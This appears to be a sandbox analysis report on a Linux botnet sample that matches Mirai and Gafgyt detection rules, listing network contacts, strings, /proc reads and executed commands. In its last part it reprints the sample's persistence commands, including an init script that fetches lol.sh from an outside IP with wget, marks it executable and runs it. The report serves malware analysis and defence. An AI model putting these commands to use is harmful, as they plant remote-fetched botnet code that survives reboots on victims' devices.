Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.125.190.26 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: x86_32.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, sh.30.dr, bootcmd.12.dr, custom.service.12.dr |
String found in binary or memory: http://94.156.227.233/ |
Source: x86_32.nn.elf, 5432.1.00000000ffe42000.00000000ffe63000.rw-.sdmp |
String found in binary or memory: http://94.156.227.233/lol.sh |
Source: x86_32.nn.elf |
String found in binary or memory: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown |
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown |
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown |
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown |
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown |
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown |
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown |
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown |
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16 |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16 |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16 |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16 |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16 |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26 |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26 |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26 |
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16 |
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16 |
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16 |
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16 |
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16 |
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26 |
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26 |
Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26 |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5263/cmdline |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5520/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5521/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5519/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5511/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5599/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5610/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5512/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5513/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5514/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/319/cmdline |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5515/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5537/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5516/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5517/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5518/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5595/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5596/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5597/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5510/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5598/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5508/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5607/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/1/cmdline |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5509/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5608/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5609/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5522/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5523/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5600/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5524/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5601/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5503/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5525/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5602/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5526/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5603/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5527/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5604/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5605/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5484) |
File opened: /proc/5606/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5449) |
Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1" |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5471) |
Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1" |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5473) |
Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1" |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5475) |
Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh" |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5476) |
Shell command executed: sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1" |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5478) |
Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1" |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5480) |
Shell command executed: sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1" |
Jump to behavior |